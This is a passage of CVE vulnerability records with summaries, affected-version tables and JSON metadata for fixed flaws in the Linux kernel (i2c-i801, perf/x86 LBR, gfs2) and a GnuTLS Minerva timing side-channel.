According to the Intel datasheets, software must reset the block
buffer index twice for block process call transactions: once before
writing the outgoing data to the buffer, and once again before
reading the incoming data from the buffer.
The driver is currently missing the second reset, causing the wrong
portion of the block buffer to be read.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-26593", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-23T18:10:30.612535Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:57.776Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:07:19.806Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "drivers/i2c/busses/i2c-i801.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "d074d5ff5ae77b18300e5079c6bda6342a4d44b7", "status": "affected", "version": "315cd67c945351f8a569500f8ab16b7fa94026e8", "versionType": "git" }, { "lessThan": "7a14b8a477b88607d157c24aeb23e7389ec3319f", "status": "affected", "version": "315cd67c945351f8a569500f8ab16b7fa94026e8", "versionType": "git" }, { "lessThan": "1f8d0691c50581ba6043f009ec9e8b9f78f09d5a", "status": "affected", "version": "315cd67c945351f8a569500f8ab16b7fa94026e8", "versionType": "git" }, { "lessThan": "491528935c9c48bf341d8b40eabc6c4fc5df6f2c", "status": "affected", "version": "315cd67c945351f8a569500f8ab16b7fa94026e8", "versionType": "git" }, { "lessThan": "6be99c51829b24c914cef5bff6164877178e84d9", "status": "affected", "version": "315cd67c945351f8a569500f8ab16b7fa94026e8", "versionType": "git" }, { "lessThan": "609c7c1cc976e740d0fed4dbeec688b3ecb5dce2", "status": "affected", "version": "315cd67c945351f8a569500f8ab16b7fa94026e8", "versionType": "git" }, { "lessThan": "c1c9d0f6f7f1dbf29db996bd8e166242843a5f21", "status": "affected", "version": "315cd67c945351f8a569500f8ab16b7fa94026e8", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "drivers/i2c/busses/i2c-i801.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "5.3" }, { "lessThan": "5.3", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.269", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.210", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.149", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.79", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.18", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni2c: i801: Fix block process call transactions\n\nAccording to the Intel datasheets, software must reset the block\nbuffer index twice for block process call transactions: once before\nwriting the outgoing data to the buffer, and once again before\nreading the incoming data from the buffer.\n\nThe driver is currently missing the second reset, causing the wrong\nportion of the block buffer to be read." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:43:09.939Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7" }, { "url": "https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f" }, { "url": "https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a" }, { "url": "https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c" }, { "url": "https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9" }, { "url": "https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2" }, { "url": "https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21" } ], "title": "i2c: i801: Fix block process call transactions", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26593", "datePublished": "2024-02-23T09:09:10.021Z", "dateReserved": "2024-02-19T14:20:24.127Z", "dateUpdated": "2024-12-19T08:43:09.939Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-28834
Vulnerability from cvelistv5
Published
2024-03-21 13:29
Modified
2024-11-25 02:45
Severity ?
EPSS score ?
Summary
A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:1784 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1879 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1997 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2044 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2570 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2889 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2024-28834 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2269228 | issue-tracking, x_refsource_REDHAT | |
https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html | ||
https://minerva.crocs.fi.muni.cz/ |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 3.7.6-23 |
||||||||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-28834", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-21T18:20:34.669036Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:15.410Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:56:58.323Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/22/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/22/2" }, { "name": "RHSA-2024:1784", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1784" }, { "name": "RHSA-2024:1879", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1879" }, { "name": "RHSA-2024:1997", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1997" }, { "name": "RHSA-2024:2044", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2044" }, { "name": "RHSA-2024:2570", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2570" }, { "name": "RHSA-2024:2889", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2889" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-28834" }, { "name": "RHBZ#2269228", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2269228" }, { "tags": [ "x_transferred" ], "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html" }, { "tags": [ "x_transferred" ], "url": "https://minerva.crocs.fi.muni.cz/" }, { "tags": [ "x_transferred" ], "url": "https://people.redhat.com/~hkario/marvin/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240524-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.com/gnutls/gnutls/", "defaultStatus": "unaffected", "packageName": "gnutls", "versions": [ { "status": "affected", "version": "3.7.6-23" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.6.16-8.el8_9.3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.6.16-8.el8_9.3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::appstream" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.6.16-5.el8_6.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::appstream" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.6.16-7.el8_8.3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.7.6-23.el9_3.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.8.3-4.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.7.6-23.el9_3.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.8.3-4.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::appstream" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.7.6-21.el9_2.3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2024-03-21T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-327", "description": "Use of a Broken or Risky Cryptographic Algorithm", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-25T02:45:53.454Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1784", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1784" }, { "name": "RHSA-2024:1879", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1879" }, { "name": "RHSA-2024:1997", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1997" }, { "name": "RHSA-2024:2044", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2044" }, { "name": "RHSA-2024:2570", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2570" }, { "name": "RHSA-2024:2889", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2889" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-28834" }, { "name": "RHBZ#2269228", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2269228" }, { "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html" }, { "url": "https://minerva.crocs.fi.muni.cz/" } ], "timeline": [ { "lang": "en", "time": "2024-03-11T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2024-03-21T00:00:00+00:00", "value": "Made public." } ], "title": "Gnutls: vulnerable to minerva side-channel information leak", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-327: Use of a Broken or Risky Cryptographic Algorithm" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-28834", "datePublished": "2024-03-21T13:29:11.532Z", "dateReserved": "2024-03-11T14:43:43.973Z", "dateUpdated": "2024-11-25T02:45:53.454Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52476
Vulnerability from cvelistv5
Published
2024-02-29 05:43
Modified
2024-12-19 08:20
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
perf/x86/lbr: Filter vsyscall addresses
We found that a panic can occur when a vsyscall is made while LBR sampling
is active. If the vsyscall is interrupted (NMI) for perf sampling, this
call sequence can occur (most recent at top):
__insn_get_emulate_prefix()
insn_get_emulate_prefix()
insn_get_prefixes()
insn_get_opcode()
decode_branch_type()
get_branch_type()
intel_pmu_lbr_filter()
intel_pmu_handle_irq()
perf_event_nmi_handler()
Within __insn_get_emulate_prefix() at frame 0, a macro is called:
peek_nbyte_next(insn_byte_t, insn, i)
Within this macro, this dereference occurs:
(insn)->next_byte
Inspecting registers at this point, the value of the next_byte field is the
address of the vsyscall made, for example the location of the vsyscall
version of gettimeofday() at 0xffffffffff600000. The access to an address
in the vsyscall region will trigger an oops due to an unhandled page fault.
To fix the bug, filtering for vsyscalls can be done when
determining the branch type. This patch will return
a "none" branch if a kernel address if found to lie in the
vsyscall region.
References
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52476", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T16:50:56.571680Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:23:20.136Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:19.936Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/403d201d1fd144cb249836dafb222f6375871c6c" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/3863989497652488a50f00e96de4331e5efabc6c" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f71edacbd4f99c0e12fe4a4007ab4d687d0688db" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/e53899771a02f798d436655efbd9d4b46c0f9265" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "arch/x86/events/utils.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "403d201d1fd144cb249836dafb222f6375871c6c", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "3863989497652488a50f00e96de4331e5efabc6c", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "f71edacbd4f99c0e12fe4a4007ab4d687d0688db", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "e53899771a02f798d436655efbd9d4b46c0f9265", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "arch/x86/events/utils.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.137", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.59", "versionType": "semver" }, { "lessThanOrEqual": "6.5.*", "status": "unaffected", "version": "6.5.8", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.6", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/lbr: Filter vsyscall addresses\n\nWe found that a panic can occur when a vsyscall is made while LBR sampling\nis active. If the vsyscall is interrupted (NMI) for perf sampling, this\ncall sequence can occur (most recent at top):\n\n __insn_get_emulate_prefix()\n insn_get_emulate_prefix()\n insn_get_prefixes()\n insn_get_opcode()\n decode_branch_type()\n get_branch_type()\n intel_pmu_lbr_filter()\n intel_pmu_handle_irq()\n perf_event_nmi_handler()\n\nWithin __insn_get_emulate_prefix() at frame 0, a macro is called:\n\n peek_nbyte_next(insn_byte_t, insn, i)\n\nWithin this macro, this dereference occurs:\n\n (insn)-\u003enext_byte\n\nInspecting registers at this point, the value of the next_byte field is the\naddress of the vsyscall made, for example the location of the vsyscall\nversion of gettimeofday() at 0xffffffffff600000. The access to an address\nin the vsyscall region will trigger an oops due to an unhandled page fault.\n\nTo fix the bug, filtering for vsyscalls can be done when\ndetermining the branch type. This patch will return\na \"none\" branch if a kernel address if found to lie in the\nvsyscall region." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:20:32.106Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/403d201d1fd144cb249836dafb222f6375871c6c" }, { "url": "https://git.kernel.org/stable/c/3863989497652488a50f00e96de4331e5efabc6c" }, { "url": "https://git.kernel.org/stable/c/f71edacbd4f99c0e12fe4a4007ab4d687d0688db" }, { "url": "https://git.kernel.org/stable/c/e53899771a02f798d436655efbd9d4b46c0f9265" } ], "title": "perf/x86/lbr: Filter vsyscall addresses", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52476", "datePublished": "2024-02-29T05:43:09.475Z", "dateReserved": "2024-02-20T12:30:33.298Z", "dateUpdated": "2024-12-19T08:20:32.106Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52448
Vulnerability from cvelistv5
Published
2024-02-22 16:21
Modified
2024-12-19 08:19
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
gfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dump
Syzkaller has reported a NULL pointer dereference when accessing
rgd->rd_rgl in gfs2_rgrp_dump(). This can happen when creating
rgd->rd_gl fails in read_rindex_entry(). Add a NULL pointer check in
gfs2_rgrp_dump() to prevent that.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c Version: 72244b6bc752b5c496f09de9a13c18adc314a53c |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52448", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-28T18:52:46.347708Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:58.504Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T22:55:41.668Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/efc8ef87ab9185a23d5676f2f7d986022d91bcde" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/5c28478af371a1c3fdb570ca67f110e1ae60fc37" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/ee0586d73cbaf0e7058bc640d62a9daf2dfa9178" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/d69d7804cf9e2ba171a27e5f98bc266f13d0414a" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/067a7c48c2c70f05f9460d6f0e8423e234729f05" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/c323efd620c741168c8e0cc6fc0be04ab57e331a" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/8877243beafa7c6bfc42022cbfdf9e39b25bd4fa" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "fs/gfs2/rgrp.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "efc8ef87ab9185a23d5676f2f7d986022d91bcde", "status": "affected", "version": "72244b6bc752b5c496f09de9a13c18adc314a53c", "versionType": "git" }, { "lessThan": "5c28478af371a1c3fdb570ca67f110e1ae60fc37", "status": "affected", "version": "72244b6bc752b5c496f09de9a13c18adc314a53c", "versionType": "git" }, { "lessThan": "ee0586d73cbaf0e7058bc640d62a9daf2dfa9178", "status": "affected", "version": "72244b6bc752b5c496f09de9a13c18adc314a53c", "versionType": "git" }, { "lessThan": "d69d7804cf9e2ba171a27e5f98bc266f13d0414a", "status": "affected", "version": "72244b6bc752b5c496f09de9a13c18adc314a53c", "versionType": "git" }, { "lessThan": "067a7c48c2c70f05f9460d6f0e8423e234729f05", "status": "affected", "version": "72244b6bc752b5c496f09de9a13c18adc314a53c", "versionType": "git" }, { "lessThan": "c323efd620c741168c8e0cc6fc0be04ab57e331a", "status": "affected", "version": "72244b6bc752b5c496f09de9a13c18adc314a53c", "versionType": "git" }, { "lessThan": "8877243beafa7c6bfc42022cbfdf9e39b25bd4fa", "status": "affected", "version": "72244b6bc752b5c496f09de9a13c18adc314a53c", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "fs/gfs2/rgrp.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "4.20" }, { "lessThan": "4.20", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.268", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.209", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.148", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.75", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.14", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.2", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": 